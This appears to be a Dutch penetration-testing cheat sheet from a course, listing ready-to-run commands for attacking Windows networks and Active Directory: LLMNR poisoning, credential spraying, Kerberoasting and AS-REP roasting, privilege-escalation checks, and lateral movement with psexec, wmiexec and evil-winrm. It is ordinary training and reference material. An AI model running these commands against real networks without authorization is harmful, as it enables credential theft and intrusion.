Cheat Sheet: Netwerk & AD

Netwerk & AD Cheat Sheet

De meest gebruikte commando's uit Deel II.

Initiële Toegang

# Responder (LLMNR/NBT-NS poisoning)
responder -I eth0 -dwP

# CrackMapExec
crackmapexec smb 10.10.10.0/24 -u user -p password
crackmapexec smb target -u user -p pass --shares

Enumeratie

# BloodHound
bloodhound-python -d domain.local -u user -p pass -c All
# Enum4linux
enum4linux -a target
# LDAP
ldapsearch -x -H ldap://dc -b "DC=domain,DC=local"

Kerberos

# Kerberoasting
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

Privilege Escalation

# Windows
winPEAS.exe
whoami /priv
# Linux
linpeas.sh
sudo -l

Laterale Beweging

# PSExec
psexec.py domain/admin:pass@target
# WMI
wmiexec.py domain/admin:pass@target
# Evil-WinRM
evil-winrm -i target -u admin -p pass